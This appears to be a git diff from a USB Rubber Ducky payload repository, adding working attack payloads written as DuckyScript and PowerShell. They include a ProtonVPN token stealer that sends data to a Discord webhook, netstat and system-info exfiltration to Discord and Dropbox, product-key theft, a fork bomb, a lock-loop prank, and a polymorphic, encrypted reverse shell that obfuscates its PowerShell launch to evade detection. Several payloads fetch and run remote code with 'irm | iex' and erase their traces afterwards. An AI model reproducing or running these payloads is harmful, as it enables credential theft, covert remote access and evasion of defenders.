Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json)
}
# Clear the PowerShell command history
Clear-History

View File

@ -0,0 +1,37 @@
# ProtonVPN config file ✅
A script used to stole target ProtonVPN config file.
**Category**: Credentials, Exfiltration
## Description
This script will stole target ProtonVPN config file.
Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
In the config file you can find a lot information about the user like:
- UserUid
- UserAccessToken
- UserRefreshToken
- UserAuthenticationPublicKey
- UserAuthenticationSecretKey
- UserAuthenticationCertificatePem
- UserCertificationServerPublicKey
- and so on...
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* ProtonVPN user logged at least one time
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke Get-Content for get in plaintext the ProtonVPN .config content
* Invoke-WebRequest will be entered in the Run Box to send the content

View File

@ -0,0 +1,43 @@
REM ###################################################################
REM # |
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM Title: ProtonVPN-config-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM In the config file you can find a lot information about the user like:
REM - UserUid
REM - UserAccessToken
REM - UserRefreshToken
REM - UserAuthenticationPublicKey
REM - UserAuthenticationSecretKey
REM - UserAuthenticationCertificatePem
REM - UserCertificationServerPublicKey
REM - and so on...
REM Then it cleans up traces of what you have done after.
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
REM Version: 1.0
REM Category: Credentials, Exfiltration
REM Requirements: ProtonVPN user logged at least one time and internet connection
REM
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE PAYLOAD example.com
STRING ';irm PAYLOAD | iex
ENTER

View File

@ -6,7 +6,7 @@
## Description ## Description
This payload exfiltrates Windows system information and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.* This payload exfiltrates Windows system information, user information (such as privileges), and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
## Usage ## Usage
@ -34,9 +34,9 @@ This payload exfiltrates Windows system information and installed programs from
- **Prepare your payload** - **Prepare your payload**
- Download the Powershell script ".ps1". - Download the Powershell script "script.ps1".
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application. - Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
- Upload your modified ".ps1" file to Dropbox and copy the upload link. - Upload your modified "script.ps1" file to Dropbox and copy the upload link.
- Replace the end of the link from "?dl=0" to "?dl=1" - Replace the end of the link from "?dl=0" to "?dl=1"
*This is your "<DOWNLOAD_LINK>".* *This is your "<DOWNLOAD_LINK>".*
- Download the "payload.txt" file. - Download the "payload.txt" file.
@ -44,9 +44,13 @@ This payload exfiltrates Windows system information and installed programs from
### Analysis ### Analysis
Once you have your report file, you can easily extract the information from the system and scan it for vulnerabilities. You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to check for missing patches that may result in a vulnerability that you could use to elevate your privileges on the target system. Once you have your report file, you can easily scan it for vulnerabilities or misconfigurations that would allow you to elevate your privileges on the target system.
The software installed on the target system may also present various opportunities for elevation of privileges. That's why the report also contains the name and version of each software installed on the target computer, allowing you to search for existing exploits on each installed software, through sites like [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com). You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to look for missing patches on the system.
You can check if the user has dangerous permissions that can be exploited.
The report also contains a list of software installed on the target computer, which allows you to search for exploits that already exist on this software, via sites such as [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
--- ---

View File

@ -12,6 +12,6 @@ GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
STRING DOWNLOAD_LINK STRING DOWNLOAD_LINK
STRING ; invoke-expression $pl STRING ; iex $pl
DELAY 500 DELAY 500
ENTER ENTER

View File

@ -3,4 +3,4 @@
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app. #Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null

View File

@ -36,7 +36,11 @@ $headers = @{
#Define the report for the file upload #Define the report for the file upload
$body = "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" $body = "# System Information #`n $(SYSTEMINFO | Out-String)"
$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
#Upload the report to Dropbox using the headers and body defined above #Upload the report to Dropbox using the headers and body defined above

View File

@ -16,10 +16,10 @@ This payload exfiltrate the target's Windows product key to a remote server. *On
``` ```
python -m http.server 80 python -m http.server 80
``` ```
- Download the "payload.txt" and ".ps1" files and modify them to include the IP address of your server. - Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server.
- Move the modified ".ps1" file to the root directory of your website, so it is downloadable from this address: - Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address:
``` ```
http://<REMOTE_IP_ADDRESS>/.ps1 http://<REMOTE_IP_ADDRESS>/script.ps1
``` ```
### Analysis ### Analysis

View File

@ -12,6 +12,6 @@ GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http:// STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
STRING REMOTE_IP_ADDRESS STRING REMOTE_IP_ADDRESS
STRING /.ps1; invoke-expression $pl STRING /.ps1; iex $pl
DELAY 500 DELAY 500
ENTER ENTER

View File

@ -0,0 +1,41 @@
# Windows netstat ✅
A script used to stole target netstat status.
**Category**: Net, Exfiltration
## Description
This script will stole target netstat status.
Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke the indicated commands
* Invoke-WebRequest will be entered in the Run Box to send the content
### Settings
Put 1 on the function that you want to active, else 0.
Functions available:
- default (*or simple 'netstat' command*)
- routing_table **$r**
- listening_canonical **$lc**
- listening_numerical **$ln**
- all_canonical **$ac**
- all_numerical **$an**
- offload **ot**
- proto **$p "\<protocol>"**
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*

View File

@ -0,0 +1,79 @@
# Discord send function
function exfiltration () {
param(
[Parameter (Mandatory = $true, Position=0)] [String]$command,
[Parameter (Mandatory = $true, Position=1)] [String]$text
)
# Loop for Discord
$ConstantLimitForRestMethod = 1999
$TMP_Body = @{
'username' = $command
'content' = ""
}
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
try {
$TMP_Body = @{
'username' = $command
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
}
} catch [ArgumentOutOfRangeException] {
if($text.Length-$i -gt 0){
$TMP_Body = @{
'username' = $command
'content' = $text.Substring($i, $text.Length-$i)
}
} else {
break
}
}
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json)
}
}
# send command format
function send_command(){
param(
[Parameter (Mandatory = $true, Position=0)] [String]$cmd
)
$out = Invoke-Expression $cmd
(exfiltration $cmd [string]$out)
}
# Settings
if ( $d -eq "1") {
$cmd = "netstat"
(send_command $cmd)
}
if ( $r -eq "1") {
$cmd = "netstat -r"
(send_command $cmd)
}
if ( $lc -eq "1") {
$cmd = "netstat -af"
(send_command $cmd)
}
if ( $ln -eq "1") {
$cmd = "netstat -an"
(send_command $cmd)
}
if ( $ac -eq "1") {
$cmd = "netstat -qf"
(send_command $cmd)
}
if ( $an -eq "1") {
$cmd = "netstat -qn"
(send_command $cmd)
}
if ( $o -eq "1") {
$cmd = "netstat -t"
(send_command $cmd)
}
if ( $p -ne "" ) {
# format $proto="TCP"
$cmd = "netstat -ps " + $p
(send_command $cmd)
}
# Clear the PowerShell command history
Clear-History

View File

@ -0,0 +1,45 @@
REM ###################################################################
REM # |
REM # Title : Windows-netstat-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Net, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM Title: Windows-netstat-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM Put 1 on the function that you want to active, else 0. Functions available:
REM - default (simple 'netstat' command)
REM - routing_table $r
REM - listening_canonical $lc
REM - listening_numerical $ln
REM - all_canonical $ac
REM - all_numerical $an
REM - offload ot
REM - proto $p "<protocol>"
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
REM Target: Windows 10-11 (PowerShell)
REM Version: 1.0
REM Category: Net, Exfiltration
REM Requirements: Internet connection
REM
REM REQUIRED - Provide your Discord WEBHOOK
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE PAYLOAD example.com
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
ENTER

View File

@ -0,0 +1,61 @@
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
REM # TITLE: Whatsapp Message Sender
REM #
REM # AUTHOR: Gopalsamy Rajendran LinkedIn: @gopalsamyrajendran Version:1.0
REM #
REM # Disclaimer: This script is only for Educational purpose. Please don't misuse it.
REM #
REM # Tested OS: Android version 12
REM #
REM # Note: Script won't work on locked devices
REM #
REM # Date: 08/03/2023
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
DEFINE PHONENUMBER +91XXXXXXXXXX
DEFINE MESSAGE Hi this is Gopalsamy Rajendran
REM #-------------------------------------------------
REM # Below lines will open search engine and type https://
DELAY 1000
GUI r
DELAY 100
STRING h
DELAY 100
STRING t
DELAY 100
STRING t
DELAY 100
STRING p
DELAY 100
STRING s
DELAY 500
DELAY 100
STRING :
DELAY 100
STRING /
DELAY 100
STRING /
DELAY 100
REM #-------------------------------------------------
REM #-------------------------------------------------
REM # Below lines will enter wa.me after https://
REM # Replace the mobile number with your's
STRING wa.me/
STRING PHONENUMBER
ENTER
DELAY 5000
REM #-------------------------------------------------
REM #-------------------------------------------------
REM # Below message will be sent to the target number confiugured above
REM # Replace the message with your own message
STRING MESSAGE
TAB
TAB
ENTER
DELAY 1000
REM #-------------------------------------------------

View File

@ -0,0 +1,54 @@
REM EternalLock
REM Version 1.0
REM OS: Windows / Unix
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out)
ATTACKMODE HID STORAGE
REM Extension DETECT_READY by Korben for best and fastest deployment
EXTENSION DETECT_READY
REM VERSION 1.0
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM TARGETS:
REM Any system that reflects CAPSLOCK will detect minimum required delay
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
REM CONFIGURATION:
DEFINE RESPONSE_DELAY 25
DEFINE ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
CAPSLOCK
DELAY RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Delay until the machine gets locked
DEFINE #TRIPWIRETIME 3000
REM Time between forced machine locks
DEFINE #LOCKTIME 100
WAIT_FOR_STORAGE_ACTIVITY
DELAY #TRIPWIRETIME
BUTTON_DEF
WHILE TRUE
ATTACKMODE STORAGE
END_WHILE
END_BUTTON
REM Lock machine until Button is pressed
WHILE TRUE
GUI l
DELAY #LOCKTIME
END_WHILE

View File

@ -0,0 +1,14 @@
REM HTML Fork Bomb by Jonny Banana
REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
DELAY 2000
CONTROL ESCAPE
DELAY 200
STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
DELAY 200
ENTER
REM set a long delay to give time to this disgusting browser
DELAY 1000
REM it's time to enable Pop-Up
TAB
DELAY 200
ENTER

View File

@ -3,11 +3,11 @@ REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
DELAY 2000 DELAY 2000
CONTROL ESCAPE CONTROL ESCAPE
DELAY 200 DELAY 200
STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/ STRING C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
DELAY 200 DELAY 200
ENTER ENTER
REM set a long delay to give time to this disgusting browser REM set a long delay to give time to this disgusting browser
DELAY 1000 DELAY 2000
REM it's time to enable Pop-Up REM it's time to enable Pop-Up
TAB TAB
DELAY 200 DELAY 200

View File

@ -0,0 +1,56 @@
# Title: ReverseDuckyUltimate
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
**What is ReverseDuckyUlitmate?**
#
*ReverseDuckyUltimate (RDU) takes the best of every ReverseDucky payload. Customization, encryption, indentifiers, multi-layer polymorphism and automatic setup!*
*RDU is the ulitmate experience when it comes to remote access via your Rubber Ducky and it's so easy to use!*
#
## Instruction
Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
- First: Create key.pem & cert.pem like so: <br>
```
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
```
It will ask for information about the certificate - Insert whatever you want.<br>
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)
- Second: Start a listener on your attacking machine which supports certificates.
Examples:
```
openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]
ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem
```
- Third: Define the IP-Address and Port of your listening machine within the payload. Additionally add an unique identifier to give your Duck a name.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)
- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
## Instruction - Automatic Setup
- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)
- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)
- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)
#
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)
Credit for DS 3.0 implentation and ideas:
- Daniel Bohannon
- Grzegorz Tworek
- Korben
- Nikhil Mittal

Binary file not shown.

After

Width:  |  Height:  |  Size: 66 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 499 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 49 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 541 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 610 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 69 KiB

View File

@ -0,0 +1,357 @@
REM ReverseDuckyUltimate
REM Version 1.1
REM OS: Windows / Unix
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.
REM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Extension Rolling_Powershell_Execution by 0iphor13 to obfuscate the start of Powershell
EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0
REM Author: 0iphor13
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.
REM CONFIGURATION:
REM Add ExecutionPolicy bypass
DEFINE #EXECUTIONPOLICY FALSE
DEFINE #DELAY 200
$_RANDOM_MIN = 1
$_RANDOM_MAX = 16
VAR $RANDOM_PS = $_RANDOM_INT
FUNCTION Rolling_Powershell_Execution()
IF ($RANDOM_PS == 1) THEN
STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
ELSE IF ($RANDOM_PS == 2) THEN
STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 3) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 4) THEN
STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
ELSE IF ($RANDOM_PS == 5) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 6) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
ELSE IF ($RANDOM_PS == 7) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 8) THEN
STRING powershell -NoPro -noninT -win h
ELSE IF ($RANDOM_PS == 9) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
ELSE IF ($RANDOM_PS == 2) THEN
STRING powershell.exe -NoP -nOni -W h
ELSE IF ($RANDOM_PS == 10) THEN
STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
ELSE IF ($RANDOM_PS == 11) THEN
STRING powershell -nopr -noninT -W HiddEn
ELSE IF ($RANDOM_PS == 12) THEN
STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
ELSE IF ($RANDOM_PS == 13) THEN
STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
ELSE IF ($RANDOM_PS == 14) THEN
STRING powershell -noproF -noni -W Hi
ELSE IF ($RANDOM_PS == 15) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
ELSE ($RANDOM_PS == 16) THEN
STRING powershell.exe -noP -nOnI -windo H
END_IF
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS
ELSE IF (($RANDOM_PS % 5) == 0) THEN
STRING -exec bypass
ELSE IF (($RANDOM_PS % 7) == 0) THEN
STRING -exeC byPasS
ELSE IF (($RANDOM_PS % 10) == 0) THEN
STRING -exEcUtionPoL bYpaSs
ELSE IF (($RANDOM_PS % 12) == 0) THEN
STRING -exEcUtion bYPaSs
ELSE
STRING -eP BYPaSs
END_IF
END_IF_DEFINED
ENTER
DELAY #DELAY
END_FUNCTION
REM EXAMPLE USAGE AFTER EXTENSION
REM DELAY 2000
REM GUI r
REM DELAY 2000
REM Rolling_Powershell_Execution()
END_EXTENSION
REM Define the attackers IP, Port and Identifier
DEFINE #ADDRESS '0.0.0.0'
DEFINE #PORT 4444
DEFINE #IDENTIFIER Ducky
REM Automatic setup requires openssl!
DEFINE #SETUP FALSE
REM Automatic setup and start listener - Requires openssl!
IF_DEFINED #SETUP
IF ($_OS == #NOT_WINDOWS) THEN
DELAY 1500
STRINGLN echo "Setting up Infrastructre - Do not interact!"
DELAY 1000
STRINGLN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && echo "Setup complete! Starting listener on Port #PORT " && openssl s_server -quiet -key key.pem -cert cert.pem -port #PORT
ELSE
DELAY 1500
GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 250
STRING Setup requires an unix based machine with openssl installed!
END_IF
ELSE_DEFINED
IF ($_OS == WINDOWS) THEN
REM Pseudo random variables for layer one polymorphism
VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE
VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE
VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE
VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE
VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE
VAR $var_gIbberish5 = $_RANDOM_UPPER_LETTER_KEYCODE
VAR $var_gibberish6 = $_RANDOM_NUMBER_KEYCODE
VAR $var_gibBerish1 = $_RANDOM_NUMBER_KEYCODE
REM Layer two polymorphism
VAR $RANDOM_LAYER = $_RANDOM_INT
REM Polymorphism function
FUNCTION Polymorphism()
IF (($RANDOM_LAYER % 2) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gIbberish5
ELSE IF (($RANDOM_LAYER % 6) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
ELSE
STRING $
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish4
END_IF
END_FUNCTION
REM Polymorphism function
FUNCTION Polymorphism2()
IF (($RANDOM_LAYER % 6) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gIbberish5
ELSE IF (($RANDOM_LAYER % 9) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
ELSE
STRING $
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish6
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gIbberish5
END_IF
END_FUNCTION
REM Polymorphism function
FUNCTION Polymorphism3()
IF (($RANDOM_LAYER % 1) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gIbberish5
ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gibberish
ELSE
STRING $
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
END_IF
END_FUNCTION
REM Polymorphism function
FUNCTION Polymorphism4()
IF (($RANDOM_LAYER % 1) == 0) THEN
STRING $
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibb3rish
ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
STRING $
INJECT_VAR $var_gibBerish1
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gibberish
ELSE
STRING $
INJECT_VAR $var_gibberish6
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
END_IF
END_FUNCTION
REM Connection Message
FUNCTION Quack_Slogan()
IF (($RANDOM_LAYER % 2) == 0) THEN
STRING "[!] Quack you $env:USERNAME/$env:COMPUTERNAME! `n[?] Opsec Tip: Use environment variables.`n`n"
ELSE IF (($RANDOM_LAYER % 3) == 0) THEN
STRING "[!] $env:USERNAME/$env:COMPUTERNAME got found a flash drive... `n[?] Considere converting IPs to decimal (e.g. 127.0.0.1 = 2130706433)`n`n"
ELSE IF (($RANDOM_LAYER % 4) == 0) THEN
STRING "[!] $env:USERNAME/$env:COMPUTERNAME compromised by #IDENTIFIER `n[+] Ducks > D0lphins!`n`n"
ELSE IF (($RANDOM_LAYER % 6) == 0) THEN
STRING "[!] Quack Attack on $env:USERNAME/$env:COMPUTERNAME `n[+] Sometimes it is better to wait...Be patient!`n`n"
